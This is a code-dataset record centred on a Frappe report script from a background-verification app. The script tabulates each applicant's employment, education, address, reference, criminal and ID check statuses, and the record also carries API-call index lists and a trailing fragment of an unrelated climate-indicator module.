out.attrs = tas.attrs out = ensure_chunk_size(out, time=-1) return out
[((1421, 1482), 'xclim.core.units.declare_units', 'declare_units', ([], {'tasmin': '"""[temperature]"""', 'tasmax': '"""[temperature]"""'}), "(tasmin='[temperature]', tasmax='[temperature]')\n", (1434, 1482), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((2760, 2794), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""'}), "(tas='[temperature]')\n", (2773, 2794), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((4548, 4583), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (4561, 4583), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6563, 6597), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""'}), "(tas='[temperature]')\n", (6576, 6597), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((8529, 8585), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""', 'pr': '"""[precipitation]"""'}), "(tas='[temperature]', pr='[precipitation]')\n", (8542, 8585), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((10436, 10471), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (10449, 10471), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((12570, 12626), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""', 'tas': '"""[temperature]"""'}), "(pr='[precipitation]', tas='[temperature]')\n", (12583, 12626), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((14495, 14530), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (14508, 14530), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((15506, 15541), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (15519, 15541), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((4379, 4405), 'xclim.core.units.convert_units_to', 'convert_units_to', (['tas', '"""K"""'], {}), "(tas, 'K')\n", (4395, 4405), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((15378, 15393), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (15389, 15393), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((16719, 16734), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (16730, 16734), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((17961, 18027), 'xarray.Dataset', 'xarray.Dataset', ([], {'data_vars': "{'criteria': criteria, 'output': output}"}), "(data_vars={'criteria': criteria, 'output': output})\n", (17975, 18027), False, 'import xarray\n'), ((19730, 19761), 'xclim.core.utils.ensure_chunk_size', 'ensure_chunk_size', (['out'], {'time': '(-1)'}), '(out, time=-1)\n', (19747, 19761), False, 'from xclim.core.utils import ensure_chunk_size\n'), ((2642, 2677), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (2660, 2677), False, 'import xarray\n'), ((4416, 4451), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (4434, 4451), False, 'import xarray\n'), ((6343, 6357), 'xclim.core.units.units2pint', 'units2pint', (['pr'], {}), '(pr)\n', (6353, 6357), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6361, 6376), 'xclim.core.units.units', 'units', (['"""mm / s"""'], {}), "('mm / s')\n", (6366, 6376), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6391, 6421), 'xclim.core.units.convert_units_to', 'convert_units_to', (['pr', '"""mm d-1"""'], {}), "(pr, 'mm d-1')\n", (6407, 6421), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6432, 6467), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (6450, 6467), False, 'import xarray\n'), ((10263, 10298), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (10281, 10298), False, 'import xarray\n'), ((19447, 19462), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (19458, 19462), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((19303, 19322), 'numpy.ceil', 'np.ceil', (['(window / 2)'], {}), '(window / 2)\n', (19310, 19322), True, 'import numpy as np\n'), ((19387, 19406), 'numpy.ceil', 'np.ceil', (['(window / 2)'], {}), '(window / 2)\n', (19394, 19406), True, 'import numpy as np\n')]
vhrspvl/vhrs-bvs
bvs/background_verification/report/checks_status_report/checks_status_report.py
56667039d9cc09ad0b092e5e6c5dd6598ff41e7b
# Copyright (c) 2013, VHRS and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe import _, msgprint from frappe.utils import (cint, cstr, date_diff, flt, getdate, money_in_words, nowdate, rounded, today) from datetime import datetime from datetime import date import datetime from calendar import monthrange def execute(filters=None): columns = get_columns() data = [] row = [] filters applicant = applicants(filters) for app in applicant: row = [app.customer, app.ref_id, app.candidate_name, app.in_date, app.status, app.checks_group] if app.status != "Entry Pending": cg = frappe.get_doc("Checks Group", app.checks_group) if cg.employment_check1 == 1: emp = frappe.get_doc("Employment Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Employment Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.employment_check2 == 1: emp = frappe.get_doc("Employment Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Employment Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.employment_check3 == 1: emp = frappe.get_doc("Employment Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Employment Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.employment_check4 == 1: emp = frappe.get_doc("Employment Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Employment Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.education_check1 == 1: if frappe.db.exists("Education Check1", { "applicant_id": app.ref_id}): emp = frappe.get_doc("Education Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Education Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.education_check2 == 1: emp = frappe.get_doc("Education Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Education Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.education_check3 == 1: emp = frappe.get_doc("Education Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Education Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.education_check4 == 1: emp = frappe.get_doc("Education Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Education Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.address_check1 == 1: emp = frappe.get_doc("Address Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Address Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.address_check2 == 1: emp = frappe.get_doc("Address Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Address Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.address_check3 == 1: emp = frappe.get_doc("Address Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Address Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.address_check4 == 1: emp = frappe.get_doc("Address Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Address Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.family_check1 == 1: emp = frappe.get_doc("Family Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Family Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.reference_check1 == 1: emp = frappe.get_doc("Reference Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Reference Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.reference_check2 == 1: emp = frappe.get_doc("Reference Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Reference Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.reference_check3 == 1: emp = frappe.get_doc("Reference Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Reference Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.reference_check4 == 1: emp = frappe.get_doc("Reference Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Reference Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.civil_check == 1: emp = frappe.get_doc("Civil Check", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Civil Check", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.criminal_check == 1: emp = frappe.get_doc("Criminal Check", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Criminal Check", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check1 == 1: emp = frappe.get_doc("ID Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check2 == 1: emp = frappe.get_doc("ID Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check3 == 1: emp = frappe.get_doc("ID Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check4 == 1: emp = frappe.get_doc("ID Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check5 == 1: emp = frappe.get_doc("ID Check5", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check5", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check6 == 1: emp = frappe.get_doc("ID Check6", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check6", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] data.append(row) return columns, data def get_columns(): columns = [ _("Project Name") + ":Link/Customer:200", _("VHRS Ref. No") + ":Data:150", _("Candidate Name") + ":Data:180", _("Start Date") + ":Date:150", _("Status") + ":Data:150", _("Checks Group Name") + ":Data:150", _("Emp Check1 Status") + ":Data:150", _("Emp Check2 Status") + ":Data:150", _("Emp Check3 Status") + ":Data:150", _("Emp Check4 Status") + ":Data:150", _("Edu Check1 Status") + ":Data:150", _("Edu Check2 Status") + ":Data:150", _("Edu Check3 Status") + ":Data:150", _("Edu Check4 Status") + ":Data:150", _("Add Check1 Status") + ":Data:150", _("Add Check2 Status") + ":Data:150", _("Add Check3 Status") + ":Data:150", _("Add Check4 Status") + ":Data:150", _("Family Check Status") + ":Data:150", _("Ref Check1 Status") + ":Data:150", _("Ref Check2 Status") + ":Data:150", _("Ref Check3 Status") + ":Data:150", _("Ref Check4 Status") + ":Data:150", _("Civil Check1 Status") + ":Data:150", _("Criminal Check2 Status") + ":Data:150", _("ID Check1 Status") + ":Data:150", _("ID Check2 Status") + ":Data:150", _("ID Check3 Status") + ":Data:150", _("ID Check4 Status") + ":Data:150", _("ID Check5 Status") + ":Data:150", _("ID Check6 Status") + ":Data:150", ] return columns def applicants(filters): applicant = frappe.db.sql( """select app.checks_group,app.customer,app.ref_id,app.candidate_name,app.in_date,app.status from `tabApplicant` app where app.in_date between %(start_date)s and %(end_date)s order by app.in_date""", { "start_date": filters.get("from_date"), "end_date": filters.get("to_date") }, as_dict=1) return applicant
[((751, 799), 'frappe.get_doc', 'frappe.get_doc', (['"""Checks Group"""', 'app.checks_group'], {}), "('Checks Group', app.checks_group)\n", (765, 799), False, 'import frappe\n'), ((12871, 12888), 'frappe._', '_', (['"""Project Name"""'], {}), "('Project Name')\n", (12872, 12888), False, 'from frappe import _, msgprint\n'), ((12921, 12938), 'frappe._', '_', (['"""VHRS Ref. No"""'], {}), "('VHRS Ref. No')\n", (12922, 12938), False, 'from frappe import _, msgprint\n'), ((12962, 12981), 'frappe._', '_', (['"""Candidate Name"""'], {}), "('Candidate Name')\n", (12963, 12981), False, 'from frappe import _, msgprint\n'), ((13005, 13020), 'frappe._', '_', (['"""Start Date"""'], {}), "('Start Date')\n", (13006, 13020), False, 'from frappe import _, msgprint\n'), ((13044, 13055), 'frappe._', '_', (['"""Status"""'], {}), "('Status')\n", (13045, 13055), False, 'from frappe import _, msgprint\n'), ((13079, 13101), 'frappe._', '_', (['"""Checks Group Name"""'], {}), "('Checks Group Name')\n", (13080, 13101), False, 'from frappe import _, msgprint\n'), ((13125, 13147), 'frappe._', '_', (['"""Emp Check1 Status"""'], {}), "('Emp Check1 Status')\n", (13126, 13147), False, 'from frappe import _, msgprint\n'), ((13171, 13193), 'frappe._', '_', (['"""Emp Check2 Status"""'], {}), "('Emp Check2 Status')\n", (13172, 13193), False, 'from frappe import _, msgprint\n'), ((13217, 13239), 'frappe._', '_', (['"""Emp Check3 Status"""'], {}), "('Emp Check3 Status')\n", (13218, 13239), False, 'from frappe import _, msgprint\n'), ((13263, 13285), 'frappe._', '_', (['"""Emp Check4 Status"""'], {}), "('Emp Check4 Status')\n", (13264, 13285), False, 'from frappe import _, msgprint\n'), ((13309, 13331), 'frappe._', '_', (['"""Edu Check1 Status"""'], {}), "('Edu Check1 Status')\n", (13310, 13331), False, 'from frappe import _, msgprint\n'), ((13355, 13377), 'frappe._', '_', (['"""Edu Check2 Status"""'], {}), "('Edu Check2 Status')\n", (13356, 13377), False, 'from frappe import _, msgprint\n'), ((13401, 13423), 'frappe._', '_', (['"""Edu Check3 Status"""'], {}), "('Edu Check3 Status')\n", (13402, 13423), False, 'from frappe import _, msgprint\n'), ((13447, 13469), 'frappe._', '_', (['"""Edu Check4 Status"""'], {}), "('Edu Check4 Status')\n", (13448, 13469), False, 'from frappe import _, msgprint\n'), ((13493, 13515), 'frappe._', '_', (['"""Add Check1 Status"""'], {}), "('Add Check1 Status')\n", (13494, 13515), False, 'from frappe import _, msgprint\n'), ((13539, 13561), 'frappe._', '_', (['"""Add Check2 Status"""'], {}), "('Add Check2 Status')\n", (13540, 13561), False, 'from frappe import _, msgprint\n'), ((13585, 13607), 'frappe._', '_', (['"""Add Check3 Status"""'], {}), "('Add Check3 Status')\n", (13586, 13607), False, 'from frappe import _, msgprint\n'), ((13631, 13653), 'frappe._', '_', (['"""Add Check4 Status"""'], {}), "('Add Check4 Status')\n", (13632, 13653), False, 'from frappe import _, msgprint\n'), ((13677, 13701), 'frappe._', '_', (['"""Family Check Status"""'], {}), "('Family Check Status')\n", (13678, 13701), False, 'from frappe import _, msgprint\n'), ((13725, 13747), 'frappe._', '_', (['"""Ref Check1 Status"""'], {}), "('Ref Check1 Status')\n", (13726, 13747), False, 'from frappe import _, msgprint\n'), ((13771, 13793), 'frappe._', '_', (['"""Ref Check2 Status"""'], {}), "('Ref Check2 Status')\n", (13772, 13793), False, 'from frappe import _, msgprint\n'), ((13817, 13839), 'frappe._', '_', (['"""Ref Check3 Status"""'], {}), "('Ref Check3 Status')\n", (13818, 13839), False, 'from frappe import _, msgprint\n'), ((13863, 13885), 'frappe._', '_', (['"""Ref Check4 Status"""'], {}), "('Ref Check4 Status')\n", (13864, 13885), False, 'from frappe import _, msgprint\n'), ((13909, 13933), 'frappe._', '_', (['"""Civil Check1 Status"""'], {}), "('Civil Check1 Status')\n", (13910, 13933), False, 'from frappe import _, msgprint\n'), ((13957, 13984), 'frappe._', '_', (['"""Criminal Check2 Status"""'], {}), "('Criminal Check2 Status')\n", (13958, 13984), False, 'from frappe import _, msgprint\n'), ((14008, 14029), 'frappe._', '_', (['"""ID Check1 Status"""'], {}), "('ID Check1 Status')\n", (14009, 14029), False, 'from frappe import _, msgprint\n'), ((14053, 14074), 'frappe._', '_', (['"""ID Check2 Status"""'], {}), "('ID Check2 Status')\n", (14054, 14074), False, 'from frappe import _, msgprint\n'), ((14098, 14119), 'frappe._', '_', (['"""ID Check3 Status"""'], {}), "('ID Check3 Status')\n", (14099, 14119), False, 'from frappe import _, msgprint\n'), ((14143, 14164), 'frappe._', '_', (['"""ID Check4 Status"""'], {}), "('ID Check4 Status')\n", (14144, 14164), False, 'from frappe import _, msgprint\n'), ((14188, 14209), 'frappe._', '_', (['"""ID Check5 Status"""'], {}), "('ID Check5 Status')\n", (14189, 14209), False, 'from frappe import _, msgprint\n'), ((14233, 14254), 'frappe._', '_', (['"""ID Check6 Status"""'], {}), "('ID Check6 Status')\n", (14234, 14254), False, 'from frappe import _, msgprint\n'), ((864, 929), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check1', {'applicant_id': app.ref_id})\n", (878, 929), False, 'import frappe\n'), ((1347, 1412), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check2', {'applicant_id': app.ref_id})\n", (1361, 1412), False, 'import frappe\n'), ((1830, 1895), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check3', {'applicant_id': app.ref_id})\n", (1844, 1895), False, 'import frappe\n'), ((2313, 2378), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check4', {'applicant_id': app.ref_id})\n", (2327, 2378), False, 'import frappe\n'), ((2792, 2858), 'frappe.db.exists', 'frappe.db.exists', (['"""Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check1', {'applicant_id': app.ref_id})\n", (2808, 2858), False, 'import frappe\n'), ((3419, 3483), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check2', {'applicant_id': app.ref_id})\n", (3433, 3483), False, 'import frappe\n'), ((3899, 3963), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check3', {'applicant_id': app.ref_id})\n", (3913, 3963), False, 'import frappe\n'), ((4379, 4443), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check4', {'applicant_id': app.ref_id})\n", (4393, 4443), False, 'import frappe\n'), ((4857, 4919), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check1', {'applicant_id': app.ref_id})\n", (4871, 4919), False, 'import frappe\n'), ((5331, 5393), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check2', {'applicant_id': app.ref_id})\n", (5345, 5393), False, 'import frappe\n'), ((5805, 5867), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check3', {'applicant_id': app.ref_id})\n", (5819, 5867), False, 'import frappe\n'), ((6279, 6341), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check4', {'applicant_id': app.ref_id})\n", (6293, 6341), False, 'import frappe\n'), ((6752, 6813), 'frappe.get_doc', 'frappe.get_doc', (['"""Family Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Family Check1', {'applicant_id': app.ref_id})\n", (6766, 6813), False, 'import frappe\n'), ((7226, 7290), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check1', {'applicant_id': app.ref_id})\n", (7240, 7290), False, 'import frappe\n'), ((7706, 7770), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check2', {'applicant_id': app.ref_id})\n", (7720, 7770), False, 'import frappe\n'), ((8186, 8250), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check3', {'applicant_id': app.ref_id})\n", (8200, 8250), False, 'import frappe\n'), ((8666, 8730), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check4', {'applicant_id': app.ref_id})\n", (8680, 8730), False, 'import frappe\n'), ((9141, 9200), 'frappe.get_doc', 'frappe.get_doc', (['"""Civil Check"""', "{'applicant_id': app.ref_id}"], {}), "('Civil Check', {'applicant_id': app.ref_id})\n", (9155, 9200), False, 'import frappe\n'), ((9609, 9671), 'frappe.get_doc', 'frappe.get_doc', (['"""Criminal Check"""', "{'applicant_id': app.ref_id}"], {}), "('Criminal Check', {'applicant_id': app.ref_id})\n", (9623, 9671), False, 'import frappe\n'), ((10078, 10135), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check1"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check1', {'applicant_id': app.ref_id})\n", (10092, 10135), False, 'import frappe\n'), ((10537, 10594), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check2"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check2', {'applicant_id': app.ref_id})\n", (10551, 10594), False, 'import frappe\n'), ((10996, 11053), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check3"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check3', {'applicant_id': app.ref_id})\n", (11010, 11053), False, 'import frappe\n'), ((11455, 11512), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check4"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check4', {'applicant_id': app.ref_id})\n", (11469, 11512), False, 'import frappe\n'), ((11914, 11971), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check5"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check5', {'applicant_id': app.ref_id})\n", (11928, 11971), False, 'import frappe\n'), ((12373, 12430), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check6"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check6', {'applicant_id': app.ref_id})\n", (12387, 12430), False, 'import frappe\n'), ((1097, 1169), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check1', {'applicant_id': app.ref_id})\n", (1111, 1169), False, 'import frappe\n'), ((1580, 1652), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check2', {'applicant_id': app.ref_id})\n", (1594, 1652), False, 'import frappe\n'), ((2063, 2135), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check3', {'applicant_id': app.ref_id})\n", (2077, 2135), False, 'import frappe\n'), ((2546, 2618), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check4', {'applicant_id': app.ref_id})\n", (2560, 2618), False, 'import frappe\n'), ((2911, 2975), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check1', {'applicant_id': app.ref_id})\n", (2925, 2975), False, 'import frappe\n'), ((3651, 3722), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check2', {'applicant_id': app.ref_id})\n", (3665, 3722), False, 'import frappe\n'), ((4131, 4202), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check3', {'applicant_id': app.ref_id})\n", (4145, 4202), False, 'import frappe\n'), ((4611, 4682), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check4', {'applicant_id': app.ref_id})\n", (4625, 4682), False, 'import frappe\n'), ((5087, 5156), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check1', {'applicant_id': app.ref_id})\n", (5101, 5156), False, 'import frappe\n'), ((5561, 5630), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check2', {'applicant_id': app.ref_id})\n", (5575, 5630), False, 'import frappe\n'), ((6035, 6104), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check3', {'applicant_id': app.ref_id})\n", (6049, 6104), False, 'import frappe\n'), ((6509, 6578), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check4', {'applicant_id': app.ref_id})\n", (6523, 6578), False, 'import frappe\n'), ((6981, 7049), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Family Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Family Check1', {'applicant_id': app.ref_id})\n", (6995, 7049), False, 'import frappe\n'), ((7458, 7529), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check1', {'applicant_id': app.ref_id})\n", (7472, 7529), False, 'import frappe\n'), ((7938, 8009), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check2', {'applicant_id': app.ref_id})\n", (7952, 8009), False, 'import frappe\n'), ((8418, 8489), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check3', {'applicant_id': app.ref_id})\n", (8432, 8489), False, 'import frappe\n'), ((8898, 8969), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check4', {'applicant_id': app.ref_id})\n", (8912, 8969), False, 'import frappe\n'), ((9368, 9434), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Civil Check"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Civil Check', {'applicant_id': app.ref_id})\n", (9382, 9434), False, 'import frappe\n'), ((9839, 9908), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Criminal Check"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Criminal Check', {'applicant_id': app.ref_id})\n", (9853, 9908), False, 'import frappe\n'), ((10303, 10367), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check1', {'applicant_id': app.ref_id})\n", (10317, 10367), False, 'import frappe\n'), ((10762, 10826), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check2', {'applicant_id': app.ref_id})\n", (10776, 10826), False, 'import frappe\n'), ((11221, 11285), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check3', {'applicant_id': app.ref_id})\n", (11235, 11285), False, 'import frappe\n'), ((11680, 11744), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check4', {'applicant_id': app.ref_id})\n", (11694, 11744), False, 